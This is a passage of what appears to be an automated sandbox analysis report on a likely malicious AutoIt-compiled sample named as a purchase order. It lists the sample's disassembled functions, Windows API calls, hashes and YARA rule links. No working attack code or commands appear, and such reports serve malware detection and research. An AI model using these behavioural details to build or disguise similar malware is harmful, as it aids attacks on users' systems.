                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: LoadString$_wcslen
                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                • API String ID: 4099089115-3080491070
                                • Opcode ID: 9e2a646b00c170e75c039d1cd26743b0bacf6186f47f917fadbb146eaef6cf9a
                                • Instruction ID: 2f3be01a5cb4db2a74959dc6d7d2a698dab39e530f351fa7e56499b1aee0ab2f
                                • Opcode Fuzzy Hash: 9e2a646b00c170e75c039d1cd26743b0bacf6186f47f917fadbb146eaef6cf9a
                                • Instruction Fuzzy Hash: 2E517D32900209EADF14EBE0DD46EEEB3B9AF24341F104065F92576052EB316F99DB61
                                Function 001BB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$BuffCharUpper
                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                • API String ID: 1256254125-769500911
                                • Opcode ID: 5e61cc796b8e4d4dd46140f3a79dcc512ff5b9a6e0f3924c92c80154015e6503
                                • Instruction ID: 7d84508857b8142904e97931d9160cb344dc29acd4ebfb873b12cc164c0e5ad0
                                • Opcode Fuzzy Hash: 5e61cc796b8e4d4dd46140f3a79dcc512ff5b9a6e0f3924c92c80154015e6503
                                • Instruction Fuzzy Hash: 2141E532A080269BCB206F7DCCD05FEB7B5AFB0758B254229E425DB684E771CD82C790
                                Function 001C5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                Download Yara Rule
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 001C53A0
                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 001C5416
                                • GetLastError.KERNEL32 ref: 001C5420
                                • SetErrorMode.KERNEL32(00000000,READY), ref: 001C54A7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Error$Mode$DiskFreeLastSpace
                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                • API String ID: 4194297153-14809454
                                • Opcode ID: 96bf70644df40201847325b98e59b23318903a3cf59f32ecd3435cd3864d6435
                                • Instruction ID: 09da3bc0d98dc47d871e7cf9f78152a67f4f57bbabdeb86ccc921b447bb7e0ee
                                • Opcode Fuzzy Hash: 96bf70644df40201847325b98e59b23318903a3cf59f32ecd3435cd3864d6435
                                • Instruction Fuzzy Hash: 84317035A00504DFC718DF68D884FA97BB5EB65305F148059E805CF292EB71EDC6CB91
                                Function 001E3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                Download Yara Rule
                                APIs
                                • CreateMenu.USER32 ref: 001E3C79
                                • SetMenu.USER32(?,00000000), ref: 001E3C88
                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001E3D10
                                • IsMenu.USER32(?), ref: 001E3D24
                                • CreatePopupMenu.USER32 ref: 001E3D2E
                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001E3D5B
                                • DrawMenuBar.USER32 ref: 001E3D63
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                • String ID: 0$F
                                • API String ID: 161812096-3044882817
                                • Opcode ID: ae89c32054be88d12ee2ae11e2c5db99d982552d5f3ec11c8b875881c19e8e51
                                • Instruction ID: 18ae5f605ad9eac59235659bf2f7f5eaa3b9ef28176a4dc0ee9ee0b86a5e9bdb
                                • Opcode Fuzzy Hash: ae89c32054be88d12ee2ae11e2c5db99d982552d5f3ec11c8b875881c19e8e51
                                • Instruction Fuzzy Hash: 44417974A01649AFDB14CFA5EC88EAE7BB5FF49310F140029E916AB360D730AA11CF90
                                Function 001E3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001E3A9D
                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 001E3AA0
                                • GetWindowLongW.USER32(?,000000F0), ref: 001E3AC7
                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001E3AEA
                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001E3B62
                                • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 001E3BAC
                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 001E3BC7
                                • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 001E3BE2
                                • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 001E3BF6
                                • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 001E3C13
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$LongWindow
                                • String ID:
                                • API String ID: 312131281-0
                                • Opcode ID: a272117b10d27682ed1aae2a90248ca6001dff02e0c67bf8b3ea85c3cb7579b7
                                • Instruction ID: 04b3a16f3d4495431c7aa6e41ade9547e4e6684a0eed5e7b73af732561a361a7
                                • Opcode Fuzzy Hash: a272117b10d27682ed1aae2a90248ca6001dff02e0c67bf8b3ea85c3cb7579b7
                                • Instruction Fuzzy Hash: 22617D75900248AFDB20DFA8CC85EEE77F8EF09700F14419AFA15A72A1C770AE95DB50
                                Function 001BB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 001BB151
                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,001BA1E1,?,00000001), ref: 001BB165
                                • GetWindowThreadProcessId.USER32(00000000), ref: 001BB16C
                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001BA1E1,?,00000001), ref: 001BB17B
                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 001BB18D
                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,001BA1E1,?,00000001), ref: 001BB1A6
                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001BA1E1,?,00000001), ref: 001BB1B8
                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,001BA1E1,?,00000001), ref: 001BB1FD
                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,001BA1E1,?,00000001), ref: 001BB212
                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,001BA1E1,?,00000001), ref: 001BB21D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                • String ID:
                                • API String ID: 2156557900-0
                                • Opcode ID: 654c62a27570b78ee19c8b28fabfbcd65993d1b3a5e2c3037fdaaf554e8df0b6
                                • Instruction ID: 2d175b4aff59a45bd72852dfd78aa8648763b920c98e66da49e93ea10a1f8351
                                • Opcode Fuzzy Hash: 654c62a27570b78ee19c8b28fabfbcd65993d1b3a5e2c3037fdaaf554e8df0b6
                                • Instruction Fuzzy Hash: 85318D75604204BFDB20DFA5ECC8FAE7BA9BB55311F104005FA11DA690D7B8AE428FB0
                                Function 00182C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00182C94
                                  • Part of subcall function 001829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000), ref: 001829DE
                                  • Part of subcall function 001829C8: GetLastError.KERNEL32(00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000,00000000), ref: 001829F0
                                • _free.LIBCMT ref: 00182CA0
                                • _free.LIBCMT ref: 00182CAB
                                • _free.LIBCMT ref: 00182CB6
                                • _free.LIBCMT ref: 00182CC1
                                • _free.LIBCMT ref: 00182CCC
                                • _free.LIBCMT ref: 00182CD7
                                • _free.LIBCMT ref: 00182CE2
                                • _free.LIBCMT ref: 00182CED
                                • _free.LIBCMT ref: 00182CFB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 95da1c031ee306122840be37cedad6da0b2b5c24fc6b2fc5828e86c81bcf99d8
                                • Instruction ID: 0c113e094b7362c6eeb317cd355b9f83e54567ea10f099f10c4a71faef98aed4
                                • Opcode Fuzzy Hash: 95da1c031ee306122840be37cedad6da0b2b5c24fc6b2fc5828e86c81bcf99d8
                                • Instruction Fuzzy Hash: 0E119076900118AFCB02FF94D982CDD3BA9FF15354F8245A5FA489B222DB35EB509F90
                                Function 00151410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                Download Yara Rule
                                APIs
                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00151459
                                • OleUninitialize.OLE32(?,00000000), ref: 001514F8
                                • UnregisterHotKey.USER32(?), ref: 001516DD
                                • DestroyWindow.USER32(?), ref: 001924B9
                                • FreeLibrary.KERNEL32(?), ref: 0019251E
                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0019254B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                • String ID: close all
                                • API String ID: 469580280-3243417748
                                • Opcode ID: f076bd34471dfd9eddebe0f8763b29e9ce8937d56044eb25967623fbfd39a413
                                • Instruction ID: 82f84ae62a18c6b537ae1d07f9b465c31bb818a333fab6c1dc3d7db47daa79d0
                                • Opcode Fuzzy Hash: f076bd34471dfd9eddebe0f8763b29e9ce8937d56044eb25967623fbfd39a413
                                • Instruction Fuzzy Hash: B5D1BD31701212EFDB2AEF14D899B69F7A0BF15301F1541ADE85A6B252DB30EC16CF90
                                Function 00155BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                Download Yara Rule
                                APIs
                                • SetWindowLongW.USER32(?,000000EB), ref: 00155C7A
                                  • Part of subcall function 00155D0A: GetClientRect.USER32(?,?), ref: 00155D30
                                  • Part of subcall function 00155D0A: GetWindowRect.USER32(?,?), ref: 00155D71
                                  • Part of subcall function 00155D0A: ScreenToClient.USER32(?,?), ref: 00155D99
                                • GetDC.USER32 ref: 001946F5
                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00194708
                                • SelectObject.GDI32(00000000,00000000), ref: 00194716
                                • SelectObject.GDI32(00000000,00000000), ref: 0019472B
                                • ReleaseDC.USER32(?,00000000), ref: 00194733
                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001947C4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                • String ID: U
                                • API String ID: 4009187628-3372436214
                                • Opcode ID: 4709d1af2c0a1db88f00c5d80f646fae261bed71f98ea2bc973abc356df29a41
                                • Instruction ID: 6498488b2e8d0f5ba0a78d6018628a6710811319da89850cd1f0c2fb30ad8ad8
                                • Opcode Fuzzy Hash: 4709d1af2c0a1db88f00c5d80f646fae261bed71f98ea2bc973abc356df29a41
                                • Instruction Fuzzy Hash: 4971E035400209DFCF29CFA4CD84EBA3BB6FF5A365F144269ED655A266C3319882DF60
                                Function 001C359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                Download Yara Rule
                                APIs
                                • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001C35E4
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                • LoadStringW.USER32(00222390,?,00000FFF,?), ref: 001C360A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: LoadString$_wcslen
                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                • API String ID: 4099089115-2391861430
                                • Opcode ID: 5848e1d7f0a4e9ba788192df135102af560b64218cd4552cf6efb1a462d740c2
                                • Instruction ID: 7853ff7d389bcda5a24bc83ca19cb1c897d87b501431a0cb87e1abdaa31dc9a3
                                • Opcode Fuzzy Hash: 5848e1d7f0a4e9ba788192df135102af560b64218cd4552cf6efb1a462d740c2
                                • Instruction Fuzzy Hash: 04518F72800209FACF14EBE0DC46EEEBB75AF24341F144169F525760A1EB315B99DFA1
                                Function 001CC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                Download Yara Rule
                                APIs
                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001CC272
                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001CC29A
                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001CC2CA
                                • GetLastError.KERNEL32 ref: 001CC322
                                • SetEvent.KERNEL32(?), ref: 001CC336
                                • InternetCloseHandle.WININET(00000000), ref: 001CC341
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                • String ID:
                                • API String ID: 3113390036-3916222277
                                • Opcode ID: a299f9cefe0df17a29c746ef53ee6a913507f031fa5333c2c3f3b005b0f1d451
                                • Instruction ID: f663a7b71e98c8daa85890c1a540bafe6b9a7abfa7ca6c5661b1e4a7fbc249f9
                                • Opcode Fuzzy Hash: a299f9cefe0df17a29c746ef53ee6a913507f031fa5333c2c3f3b005b0f1d451
                                • Instruction Fuzzy Hash: 80319AB1A00248AFD7219FA49C88FAF7BFCFB69740B14851EF44A96601DB30DD458BE1
                                Function 001B989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00193AAF,?,?,Bad directive syntax error,001ECC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 001B98BC
                                • LoadStringW.USER32(00000000,?,00193AAF,?), ref: 001B98C3
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 001B9987
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: HandleLoadMessageModuleString_wcslen
                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                • API String ID: 858772685-4153970271
                                • Opcode ID: a7e18f179cff5b06543278216a804e5208ae76de2d69f84a5d381ad4e6c6c8fc
                                • Instruction ID: 4f2232bbc9713799403ba3055ec96d59f5f482d8336c8012b1ae1e8af6dc32bb
                                • Opcode Fuzzy Hash: a7e18f179cff5b06543278216a804e5208ae76de2d69f84a5d381ad4e6c6c8fc
                                • Instruction Fuzzy Hash: CA21B131C0021EEBCF15AF90CC0AEEE7775FF29305F044469F9256A0A2EB319668DB51
                                Function 001B209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetParent.USER32 ref: 001B20AB
                                • GetClassNameW.USER32(00000000,?,00000100), ref: 001B20C0
                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001B214D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ClassMessageNameParentSend
                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                • API String ID: 1290815626-3381328864
                                • Opcode ID: 9794a5faadf5d0027b5845e033ed6e04e597a550aa79247c64fcb5bc973b4163
                                • Instruction ID: 5c76f2a68032a52c293b56e7d136ac733978ade2fbf1b443d5b427bb16202958
                                • Opcode Fuzzy Hash: 9794a5faadf5d0027b5845e033ed6e04e597a550aa79247c64fcb5bc973b4163
                                • Instruction Fuzzy Hash: 1A1159B668C316FAF6052224DC07CEB33ECCB25328B204056FB09E50D6FF7568965A54
                                Function 00188D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 166d44584bb2a3a6ae2c315804138d004fc902f27391e7d01e07fc3301890a7c
                                • Instruction ID: 59b25734382bd75dfe965338c452cb5e218d0faaa72605c97b3ccbbd90172988
                                • Opcode Fuzzy Hash: 166d44584bb2a3a6ae2c315804138d004fc902f27391e7d01e07fc3301890a7c
                                • Instruction Fuzzy Hash: 56C1D474904249AFDB21EFE8D845BBDBBB4AF19310F184199F518A7392CB349A42CF61
                                Function 0018CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                • String ID:
                                • API String ID: 1282221369-0
                                • Opcode ID: 3c98c0c01e8ab96126cf09d17c0149d01e21dcfcbe47278aada8a34afc7f2f91
                                • Instruction ID: eb05ad79db7cda97b2499ddfc2d2978f60a8ebdad785d0a0874c8060534e4d5e
                                • Opcode Fuzzy Hash: 3c98c0c01e8ab96126cf09d17c0149d01e21dcfcbe47278aada8a34afc7f2f91
                                • Instruction Fuzzy Hash: 3A616971904311AFEF32BFB4A885A6A7BA5EF11310F15416EFA4497282D7319F028FE0
                                Function 00168B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                Download Yara Rule
                                APIs
                                • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 001A6890
                                • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 001A68A9
                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001A68B9
                                • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 001A68D1
                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001A68F2
                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00168874,00000000,00000000,00000000,000000FF,00000000), ref: 001A6901
                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 001A691E
                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00168874,00000000,00000000,00000000,000000FF,00000000), ref: 001A692D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
